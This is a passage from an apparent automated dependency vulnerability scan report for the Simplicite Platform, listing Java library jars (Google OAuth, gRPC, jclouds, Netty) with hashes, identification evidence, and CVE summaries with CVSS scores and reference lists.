| Vendor | Manifest | automatic-module-name | com.google.api.client.json.jackson2 | Medium |
| Vendor | Manifest | build-jdk-spec | 1.8 | Low |
| Vendor | pom | artifactid | google-http-client-jackson2 | Highest |
| Vendor | pom | artifactid | google-http-client-jackson2 | Low |
| Vendor | pom | groupid | com.google.http-client | Highest |
| Vendor | pom | name | Jackson 2 extensions to the Google HTTP Client Library for Java. | High |
| Vendor | pom | parent-artifactid | google-http-client-parent | Low |
| Product | file | name | google-http-client-jackson2 | High |
| Product | jar | package name | api | Highest |
| Product | jar | package name | client | Highest |
| Product | jar | package name | google | Highest |
| Product | jar | package name | json | Highest |
| Product | Manifest | automatic-module-name | com.google.api.client.json.jackson2 | Medium |
| Product | Manifest | build-jdk-spec | 1.8 | Low |
| Product | pom | artifactid | google-http-client-jackson2 | Highest |
| Product | pom | groupid | com.google.http-client | Highest |
| Product | pom | name | Jackson 2 extensions to the Google HTTP Client Library for Java. | High |
| Product | pom | parent-artifactid | google-http-client-parent | Medium |
| Version | file | version | 1.32.0 | High |
| Version | pom | version | 1.32.0 | Highest |
CVE-2022-45688
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data.
CWE-787 Out-of-bounds Write
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-5072
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
google-oauth-client-1.30.2.jar
Description:
Google OAuth Client Library for Java. Functionality that works on all supported Java platforms,
including Java 7 (or higher) desktop (SE) and web (EE), Android, and Google App Engine.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/oauth-client/google-oauth-client/1.30.2/google-oauth-client-1.30.2.jar
MD5: bbf90ca5aeac05210461cb292e9b7027
SHA1: bc33df03b169de18386256adf23af6bc5f41cb28
SHA256: f97bd2674949d0ce59e198129edf46dbd7c5509f382a1f41ff25040046ff5178
Referenced In Project/Scope: Simplicite Platform:compile
Evidence

| Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | google-oauth-client | High |
| Vendor | jar | package name | api | Highest |
| Vendor | jar | package name | auth | Highest |
| Vendor | jar | package name | client | Highest |
| Vendor | jar | package name | google | Highest |
| Vendor | Manifest | automatic-module-name | com.google.api.client.auth | Medium |
| Vendor | Manifest | build-jdk-spec | 1.8 | Low |
| Vendor | Manifest | bundle-docurl | https://www.google.com/ | Low |
| Vendor | Manifest | bundle-requiredexecutionenvironment | JavaSE-1.7 | Low |
| Vendor | Manifest | bundle-symbolicname | com.google.oauth-client | Medium |
| Vendor | Manifest | Implementation-Vendor | Google | High |
| Vendor | Manifest | Implementation-Vendor-Id | com.google.oauth-client | Medium |
| Vendor | Manifest | originally-created-by | Apache Maven Bundle Plugin | Low |
| Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low |
| Vendor | pom | artifactid | google-oauth-client | Highest |
| Vendor | pom | artifactid | google-oauth-client | Low |
| Vendor | pom | groupid | com.google.oauth-client | Highest |
| Vendor | pom | name | Google OAuth Client Library for Java | High |
| Vendor | pom | parent-artifactid | google-oauth-client-parent | Low |
| Product | file | name | google-oauth-client | High |
| Product | jar | package name | api | Highest |
| Product | jar | package name | auth | Highest |
| Product | jar | package name | client | Highest |
| Product | jar | package name | google | Highest |
| Product | Manifest | automatic-module-name | com.google.api.client.auth | Medium |
| Product | Manifest | build-jdk-spec | 1.8 | Low |
| Product | Manifest | bundle-docurl | https://www.google.com/ | Low |
| Product | Manifest | Bundle-Name | Google OAuth Client Library for Java | Medium |
| Product | Manifest | bundle-requiredexecutionenvironment | JavaSE-1.7 | Low |
| Product | Manifest | bundle-symbolicname | com.google.oauth-client | Medium |
| Product | Manifest | Implementation-Title | Google OAuth Client Library for Java | High |
| Product | Manifest | originally-created-by | Apache Maven Bundle Plugin | Low |
| Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low |
| Product | pom | artifactid | google-oauth-client | Highest |
| Product | pom | groupid | com.google.oauth-client | Highest |
| Product | pom | name | Google OAuth Client Library for Java | High |
| Product | pom | parent-artifactid | google-oauth-client-parent | Medium |
| Version | file | version | 1.30.2 | High |
| Version | Manifest | Bundle-Version | 1.30.2 | High |
| Version | Manifest | Implementation-Version | 1.30.2 | High |
| Version | pom | version | 1.30.2 | Highest |
CVE-2020-7692
PKCE support is not implemented in accordance with the RFC for OAuth 2.0 for Native Apps. Without the use of PKCE, the authorization code returned by an authorization server is not enough to guarantee that the client that issued the initial authorization request is the one that will be authorized. An attacker is able to obtain the authorization code using a malicious app on the client-side and use it to gain authorization to the protected resource. This affects the package com.google.oauth-client:google-oauth-client before 1.31.0.
CWE-863 Incorrect Authorization
CVSSv2: Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N
CVSSv3: Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2021-22573
The vulnerability is that the IDToken verifier does not verify whether the token is properly signed. Signature verification makes sure that the token's payload comes from a valid provider, not from someone else. An attacker can provide a compromised token with a custom payload. The token will pass the validation on the client side. We recommend upgrading to version 1.33.3 or above.
CWE-347 Improper Verification of Cryptographic Signature
CVSSv2: Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:P/A:N
CVSSv3: Base Score: HIGH (7.3) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
References:
Vulnerable Software & Versions:
googlecloud-2.2.0.jar
Description:
jclouds components common to Google Cloud products
License:
https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/jclouds/common/googlecloud/2.2.0/googlecloud-2.2.0.jar
MD5: 20b180abf74f86ace4464018768d57a5
SHA1: d07a6d75dfe2d36036b42255403f907a901985c7
SHA256: 80692d8e51eb19e85f5507124ed1b32012f2bd20b855083ea773dcf8c023f610
Referenced In Project/Scope: Simplicite Platform:compile
Evidence

| Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | googlecloud | High |
| Vendor | jar | package name | googlecloud | Highest |
| Vendor | jar | package name | jclouds | Highest |
| Vendor | Manifest | bundle-docurl | http://www.apache.org/ | Low |
| Vendor | Manifest | bundle-symbolicname | googlecloud | Medium |
| Vendor | Manifest | Implementation-Vendor | jclouds | High |
| Vendor | Manifest | Implementation-Vendor-Id | org.jclouds | Medium |
| Vendor | Manifest | specification-vendor | jclouds | Low |
| Vendor | pom | artifactid | googlecloud | Highest |
| Vendor | pom | artifactid | googlecloud | Low |
| Vendor | pom | groupid | org.apache.jclouds.common | Highest |
| Vendor | pom | name | jclouds Google Cloud Core | High |
| Vendor | pom | parent-artifactid | jclouds-project | Low |
| Vendor | pom | parent-groupid | org.apache.jclouds | Medium |
| Product | file | name | googlecloud | High |
| Product | jar | package name | googlecloud | Highest |
| Product | jar | package name | jclouds | Highest |
| Product | Manifest | bundle-docurl | http://www.apache.org/ | Low |
| Product | Manifest | Bundle-Name | jclouds Google Cloud Core | Medium |
| Product | Manifest | bundle-symbolicname | googlecloud | Medium |
| Product | Manifest | Implementation-Title | jclouds Google Cloud Core | High |
| Product | Manifest | specification-title | jclouds jclouds Google Cloud Core | Medium |
| Product | pom | artifactid | googlecloud | Highest |
| Product | pom | groupid | org.apache.jclouds.common | Highest |
| Product | pom | name | jclouds Google Cloud Core | High |
| Product | pom | parent-artifactid | jclouds-project | Medium |
| Product | pom | parent-groupid | org.apache.jclouds | Medium |
| Version | file | version | 2.2.0 | High |
| Version | Manifest | Bundle-Version | 2.2.0 | High |
| Version | Manifest | Implementation-Version | 2.2.0 | High |
| Version | pom | version | 2.2.0 | Highest |
grib-4.5.5.jar
Description:
Decoder for the GRIB format.
File Path: /var/simplicite/.m2/repository/edu/ucar/grib/4.5.5/grib-4.5.5.jar
MD5: 0cb80276d8ea89cacc1d5632dbf39fe9
SHA1: cfe552910e9a8d57ce71134796abb281a74ead16
SHA256: 1e0492135f421f554c4651a95225f27f2a3230e993329f69348110f8521c32d9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence

| Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | grib | High |
| Vendor | jar | package name | collection | Highest |
| Vendor | jar | package name | grib | Highest |
| Vendor | jar | package name | thredds | Highest |
| Vendor | jar | package name | ucar | Highest |
| Vendor | Manifest | built-on | 20150306.1537 | Low |
| Vendor | Manifest | Implementation-Vendor | UCAR/Unidata | High |
| Vendor | Manifest | Implementation-Vendor-Id | edu.ucar | Medium |
| Vendor | pom | artifactid | grib | Highest |
| Vendor | pom | artifactid | grib | Low |
| Vendor | pom | developer email | caron@unidata.ucar.edu | Low |
| Vendor | pom | developer id | caron | Medium |
| Vendor | pom | developer name | John Caron | Medium |
| Vendor | pom | developer name | Robb Kambic | Medium |
| Vendor | pom | developer org | UCAR/UNIDATA | Medium |
| Vendor | pom | developer org URL | http://www.unidata.ucar.edu/ | Medium |
| Vendor | pom | groupid | edu.ucar | Highest |
| Vendor | pom | name | GRIB IOSP and Feature Collection | High |
| Vendor | pom | parent-artifactid | thredds-parent | Low |
| Vendor | pom | url | http://www.unidata.ucar.edu/software/netcdf-java/ | Highest |
| Product | file | name | grib | High |
| Product | jar | package name | collection | Highest |
| Product | jar | package name | grib | Highest |
| Product | jar | package name | thredds | Highest |
| Product | jar | package name | ucar | Highest |
| Product | Manifest | built-on | 20150306.1537 | Low |
| Product | Manifest | Implementation-Title | GRIB IOSP and Feature Collection | High |
| Product | pom | artifactid | grib | Highest |
| Product | pom | developer email | caron@unidata.ucar.edu | Low |
| Product | pom | developer id | caron | Low |
| Product | pom | developer name | John Caron | Low |
| Product | pom | developer name | Robb Kambic | Low |
| Product | pom | developer org | UCAR/UNIDATA | Low |
| Product | pom | developer org URL | http://www.unidata.ucar.edu/ | Low |
| Product | pom | groupid | edu.ucar | Highest |
| Product | pom | name | GRIB IOSP and Feature Collection | High |
| Product | pom | parent-artifactid | thredds-parent | Medium |
| Product | pom | url | http://www.unidata.ucar.edu/software/netcdf-java/ | Medium |
| Version | file | version | 4.5.5 | High |
| Version | Manifest | Implementation-Version | 4.5.5 | High |
| Version | pom | version | 4.5.5 | Highest |
grpc-context-1.22.1.jar
Description:
gRPC: Context
License:
Apache 2.0: https://opensource.org/licenses/Apache-2.0
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-context/1.22.1/grpc-context-1.22.1.jar
MD5: c114b573888704a725b5a86c04f817da
SHA1: 1a074f9cf6f367b99c25e70dc68589f142f82d11
SHA256: 780a3937705b3c92e07292c97d065b2676fcbe031eae250f1622b026485f294e
Referenced In Project/Scope: Simplicite Platform:compile
Evidence

| Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | grpc-context | High |
| Vendor | jar | package name | context | Highest |
| Vendor | jar | package name | grpc | Highest |
| Vendor | jar | package name | io | Highest |
| Vendor | Manifest | source-compatibility | 1.7 | Low |
| Vendor | Manifest | target-compatibility | 1.7 | Low |
| Vendor | pom | artifactid | grpc-context | Highest |
| Vendor | pom | artifactid | grpc-context | Low |
| Vendor | pom | developer email | grpc-io@googlegroups.com | Low |
| Vendor | pom | developer id | grpc.io | Medium |
| Vendor | pom | developer name | gRPC Contributors | Medium |
| Vendor | pom | developer org | gRPC Authors | Medium |
| Vendor | pom | developer org URL | https://www.google.com | Medium |
| Vendor | pom | groupid | io.grpc | Highest |
| Vendor | pom | name | io.grpc:grpc-context | High |
| Vendor | pom | url | grpc/grpc-java | Highest |
| Product | file | name | grpc-context | High |
| Product | jar | package name | context | Highest |
| Product | jar | package name | grpc | Highest |
| Product | jar | package name | io | Highest |
| Product | Manifest | Implementation-Title | grpc-context | High |
| Product | Manifest | source-compatibility | 1.7 | Low |
| Product | Manifest | target-compatibility | 1.7 | Low |
| Product | pom | artifactid | grpc-context | Highest |
| Product | pom | developer email | grpc-io@googlegroups.com | Low |
| Product | pom | developer id | grpc.io | Low |
| Product | pom | developer name | gRPC Contributors | Low |
| Product | pom | developer org | gRPC Authors | Low |
| Product | pom | developer org URL | https://www.google.com | Low |
| Product | pom | groupid | io.grpc | Highest |
| Product | pom | name | io.grpc:grpc-context | High |
| Product | pom | url | grpc/grpc-java | High |
| Version | file | version | 1.22.1 | High |
| Version | Manifest | Implementation-Version | 1.22.1 | High |
| Version | pom | version | 1.22.1 | Highest |
CVE-2023-33953
gRPC contains a vulnerability in which HPACK table accounting errors could lead to unwanted disconnects between clients and servers in exceptional cases. Three vectors were found that allow the following DoS attacks:
- Unbounded memory buffering in the HPACK parser
- Unbounded CPU consumption in the HPACK parser
The unbounded CPU consumption is down to a copy that occurred per input block in the parser; because that copy could be unbounded due to the memory copy bug, the result is an O(n^2) parsing loop, with n selected by the client.
The unbounded memory buffering bugs:
- The header size limit check was behind the string reading code, so the parser first had to buffer up to a 4 gigabyte string before rejecting it as longer than 8 or 16kb.
- HPACK varints have an encoding quirk whereby an infinite number of 0's can be added at the start of an integer. gRPC's HPACK parser needed to read all of them before concluding a parse.
- gRPC's metadata overflow check was performed per frame, so the following sequence of frames could cause infinite buffering: HEADERS containing a: 1, CONTINUATION containing a: 2, CONTINUATION containing a: 3, and so on.
CWE-834 Excessive Iteration, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-32732
gRPC contains a vulnerability whereby a client can cause a termination of the connection between an HTTP2 proxy and a gRPC server: a base64 encoding error for `-bin` suffixed headers will result in a disconnection by the gRPC server, but is typically allowed by HTTP2 proxies. We recommend upgrading beyond the commit in https://github.com/grpc/grpc/pull/32309
NVD-CWE-Other
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
References:
Vulnerable Software & Versions:
grpc-core-1.23.0.jar
Description:
gRPC: Core
License:
Apache 2.0: https://opensource.org/licenses/Apache-2.0
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-core/1.23.0/grpc-core-1.23.0.jar
MD5: d70312da590558ac0518886976de6b84
SHA1: 82d0c88d65acf92fb3d66a0ee800b5da85258c39
SHA256: ccb52503d051fca980ac7853fb9d8aaf3f00a6fadf16fffd574296b26b3d440b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence

| Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | grpc-core | High |
| Vendor | jar | package name | grpc | Highest |
| Vendor | jar | package name | io | Highest |
| Vendor | Manifest | source-compatibility | 1.7 | Low |
| Vendor | Manifest | target-compatibility | 1.7 | Low |
| Vendor | pom | artifactid | grpc-core | Highest |
| Vendor | pom | artifactid | grpc-core | Low |
| Vendor | pom | developer email | grpc-io@googlegroups.com | Low |
| Vendor | pom | developer id | grpc.io | Medium |
| Vendor | pom | developer name | gRPC Contributors | Medium |
| Vendor | pom | developer org | gRPC Authors | Medium |
| Vendor | pom | developer org URL | https://www.google.com | Medium |
| Vendor | pom | groupid | io.grpc | Highest |
| Vendor | pom | name | io.grpc:grpc-core | High |
| Vendor | pom | url | grpc/grpc-java | Highest |
| Product | file | name | grpc-core | High |
| Product | jar | package name | grpc | Highest |
| Product | jar | package name | io | Highest |
| Product | Manifest | Implementation-Title | grpc-core | High |
| Product | Manifest | source-compatibility | 1.7 | Low |
| Product | Manifest | target-compatibility | 1.7 | Low |
| Product | pom | artifactid | grpc-core | Highest |
| Product | pom | developer email | grpc-io@googlegroups.com | Low |
| Product | pom | developer id | grpc.io | Low |
| Product | pom | developer name | gRPC Contributors | Low |
| Product | pom | developer org | gRPC Authors | Low |
| Product | pom | developer org URL | https://www.google.com | Low |
| Product | pom | groupid | io.grpc | Highest |
| Product | pom | name | io.grpc:grpc-core | High |
| Product | pom | url | grpc/grpc-java | High |
| Version | file | version | 1.23.0 | High |
| Version | Manifest | Implementation-Version | 1.23.0 | High |
| Version | pom | version | 1.23.0 | Highest |
Related Dependencies

grpc-alts-1.23.0.jar
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-alts/1.23.0/grpc-alts-1.23.0.jar
MD5: 03e3621942d9bf763bf8b7ae9e92b591
SHA1: bfa3dc430f7877abf11ea0da9d596dcd75eec61d
SHA256: b9d46115212d0b6183134e39cac3aa428598b031dd15b1779e253896690b681f
pkg:maven/io.grpc/grpc-alts@1.23.0

grpc-api-1.23.0.jar
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-api/1.23.0/grpc-api-1.23.0.jar
MD5: da37c14bf614d706aaa9f00590cfa91b
SHA1: 903f250bc1d01299480e526a25cd974088699a48
SHA256: ff4486cdd89b6e4568af13f71e0480bad6a06391a3d636996ce1d4a353516373
pkg:maven/io.grpc/grpc-api@1.23.0

grpc-auth-1.23.0.jar
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-auth/1.23.0/grpc-auth-1.23.0.jar
MD5: 4358dc8d1132cb9d48ea2197659044b9
SHA1: 19d71f19653d2cc786498819557431312d0dbf2d
SHA256: c827efaefb17bf274eea654de4f0fe6cb3eef53548635e8fad2e8a1bf8a18b44
pkg:maven/io.grpc/grpc-auth@1.23.0

grpc-grpclb-1.23.0.jar
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-grpclb/1.23.0/grpc-grpclb-1.23.0.jar
MD5: cb4ccf8972f972d1d209f741d4afb402
SHA1: 99e6dad4cb8f00ad17e01c25ff5a14a933c1b9ba
SHA256: c4e88b277c4822203f50f7fe1c56c40d8377d1b268de726471e0ee113f8b769f
pkg:maven/io.grpc/grpc-grpclb@1.23.0

grpc-netty-shaded-1.23.0.jar
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar
MD5: 456f3a4c7c60aec30886dcc4a03eb206
SHA1: 29c6b73d13098a7e0876cce325b3cd6204ed3297
SHA256: 42e3fa013d0e2a98bc55e8ec4f9c473442b4d527760e3fb565a44626fcf1c3a4
pkg:maven/io.grpc/grpc-netty-shaded@1.23.0

grpc-stub-1.23.0.jar
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-stub/1.23.0/grpc-stub-1.23.0.jar
MD5: c3aacd8363bbfac5318d1c5f2ccd53ce
SHA1: 2e9e6890a7e8402a9b715ce1fad0d1827e733e49
SHA256: 2c4120cf61461de4da76e85edd81e1437696bb2689fb78acce1f76930321d7fe
pkg:maven/io.grpc/grpc-stub@1.23.0

CVE-2023-33953
gRPC contains a vulnerability in which HPACK table accounting errors could lead to unwanted disconnects between clients and servers in exceptional cases. Three vectors were found that allow the following DoS attacks:
- Unbounded memory buffering in the HPACK parser
- Unbounded CPU consumption in the HPACK parser
The unbounded CPU consumption is down to a copy that occurred per input block in the parser; because that copy could be unbounded due to the memory copy bug, the result is an O(n^2) parsing loop, with n selected by the client.
The unbounded memory buffering bugs:
- The header size limit check was behind the string reading code, so the parser first had to buffer up to a 4 gigabyte string before rejecting it as longer than 8 or 16kb.
- HPACK varints have an encoding quirk whereby an infinite number of 0's can be added at the start of an integer. gRPC's HPACK parser needed to read all of them before concluding a parse.
- gRPC's metadata overflow check was performed per frame, so the following sequence of frames could cause infinite buffering: HEADERS containing a: 1, CONTINUATION containing a: 2, CONTINUATION containing a: 3, and so on.
CWE-834 Excessive Iteration, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-4785
Lack of error handling in the TCP server in Google's gRPC starting with version 1.23 on POSIX-compatible platforms (e.g. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++, Python, and Ruby are affected, but gRPC Java and Go are NOT affected.
NVD-CWE-noinfo
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-32732
gRPC contains a vulnerability whereby a client can cause a termination of the connection between an HTTP2 proxy and a gRPC server: a base64 encoding error for `-bin` suffixed headers will result in a disconnection by the gRPC server, but is typically allowed by HTTP2 proxies. We recommend upgrading beyond the commit in https://github.com/grpc/grpc/pull/32309
NVD-CWE-Other
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
References:
Vulnerable Software & Versions:
grpc-google-cloud-pubsub-v1-1.73.0.jar
Description:
GRPC library for grpc-google-cloud-pubsub-v1
File Path: /var/simplicite/.m2/repository/com/google/api/grpc/grpc-google-cloud-pubsub-v1/1.73.0/grpc-google-cloud-pubsub-v1-1.73.0.jar
MD5: 9b3a2decec756af86003548f774a2c67
SHA1: 0c4d29736d21922b05641d402a8afff91fb49eb6
SHA256: 07c9e4928c355de591941cd65ab8f714123de76c64ecda3c21d89a5e921932c9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence

| Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | grpc-google-cloud-pubsub-v1 | High |
| Vendor | jar | package name | google | Highest |
| Vendor | jar | package name | google | Low |
| Vendor | jar | package name | pubsub | Highest |
| Vendor | jar | package name | pubsub | Low |
| Vendor | jar | package name | v1 | Highest |
| Vendor | jar | package name | v1 | Low |
| Vendor | pom | artifactid | grpc-google-cloud-pubsub-v1 | Highest |
| Vendor | pom | artifactid | grpc-google-cloud-pubsub-v1 | Low |
| Vendor | pom | groupid | com.google.api.grpc | Highest |
| Vendor | pom | name | grpc-google-cloud-pubsub-v1 | High |
| Vendor | pom | parent-artifactid | google-api-grpc | Low |
| Product | file | name | grpc-google-cloud-pubsub-v1 | High |
| Product | jar | package name | google | Highest |
| Product | jar | package name | pubsub | Highest |
| Product | jar | package name | pubsub | Low |
| Product | jar | package name | v1 | Highest |
| Product | jar | package name | v1 | Low |
| Product | pom | artifactid | grpc-google-cloud-pubsub-v1 | Highest |
| Product | pom | groupid | com.google.api.grpc | Highest |
| Product | pom | name | grpc-google-cloud-pubsub-v1 | High |
| Product | pom | parent-artifactid | google-api-grpc | Medium |
| Version | file | version | 1.73.0 | High |
| Version | pom | parent-version | 1.73.0 | Low |
| Version | pom | version | 1.73.0 | Highest |
grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-codec-http2:4.1.38.Final)
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-codec-http2/pom.xml
MD5: 4d185495e97a28fdc3ec0433e273f4c4
SHA1: a29512948602165fb6e0ebbfd2a55c23d1ad164c
SHA256: 40f6d923fc56b303e286f67214d00a9501d853922344917be4c0b2a6919100b0
Referenced In Project/Scope: Simplicite Platform:compile
Evidence

| Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | pom | artifactid | netty-codec-http2 | Low |
| Vendor | pom | groupid | io.netty | Highest |
| Vendor | pom | name | Netty/Codec/HTTP2 | High |
| Vendor | pom | parent-artifactid | netty-parent | Low |
| Product | pom | artifactid | netty-codec-http2 | Highest |
| Product | pom | groupid | io.netty | Highest |
| Product | pom | name | Netty/Codec/HTTP2 | High |
| Product | pom | parent-artifactid | netty-parent | Medium |
| Version | pom | version | 4.1.38.Final | Highest |
CVE-2019-20444
HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an "invalid fold."
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N
CVSSv3: Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
References:
- FEDORA-2020-66b5f85ccc
- [bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image
- [camel-commits] 20201120 [camel] branch camel-2.25.x updated: Updating Netty to 4.1.48.Final to fix some CVEs (e.g. CVE-2019-16869, CVE-2019-20444)
- [cassandra-commits] 20200218 [jira] [Created] (CASSANDRA-15590) Upgrade io.netty_netty-all dependency to fix security vulnerabilities
- [cassandra-commits] 20200604 [jira] [Created] (CASSANDRA-15856) Security vulnerabilities with dependency jars of Cassandra 3.11.6
- [druid-commits] 20200131 [GitHub] [druid] ccaominh commented on a change in pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444
- [druid-commits] 20200131 [GitHub] [druid] gianm merged pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444
- [druid-commits] 20200131 [GitHub] [druid] zachjsh opened a new pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444
- [flink-dev] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink
- [flink-issues] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink
- [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [geode-dev] 20200408 Proposal to bring GEODE-7969 to support/1.12
- [geode-dev] 20200408 Re: Proposal to bring GEODE-7969 to support/1.12
- [hadoop-common-commits] 20200309 [hadoop] branch branch-3.1 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869
- [hadoop-common-commits] 20200309 [hadoop] branch branch-3.2 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869
- [hadoop-common-commits] 20200309 [hadoop] branch trunk updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869
- [hadoop-common-issues] 20200219 [jira] [Assigned] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,
- [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200224 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200225 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200309 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200309 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200310 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [pulsar-commits] 20201215 [GitHub] [pulsar] yanshuchong opened a new issue #8967: CVSS issue list
- [pulsar-commits] 20210120 [GitHub] [pulsar] fmiguelez opened a new issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444
- [pulsar-commits] 20210121 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444
- [pulsar-commits] 20210122 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444
- [spark-issues] 20210824 [jira] [Created] (SPARK-36572) Upgrade version of io.netty to 4.1.44.Final to solve CVE-2019-20444 and CVE-2019-20445
- [zookeeper-dev] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-dev] 20200204 Build failed in Jenkins: zookeeper-branch36-java11 #39
